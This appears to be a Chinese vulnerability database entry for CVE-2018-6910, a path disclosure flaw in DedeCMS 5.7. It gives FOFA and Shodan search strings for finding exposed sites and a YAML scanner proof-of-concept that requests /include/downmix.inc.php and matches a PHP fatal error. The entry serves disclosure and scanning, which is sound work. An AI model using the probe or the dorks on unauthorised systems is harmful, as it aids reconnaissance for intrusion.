CVE-2018-6910: DedeCMS 5.7 Web Path Disclosure

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

DedeCMS 5.7 Web Path Disclosure fofa: app="Dedecms" shodan: http.html:"Dedecms"

PoC代码[已公开]

id: CVE-2018-6910

info:
  name: DedeCMS 5.7 Web Path Disclosure
  author: PickledFish
  severity: low
  description: |-
    DedeCMS 5.7 Web Path Disclosure
    fofa: app="Dedecms"
    shodan: http.html:"Dedecms"
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2018-6910
  tags: cve,cve2018,dedecms,disclosure
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /include/downmix.inc.php
    expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
expression: r0()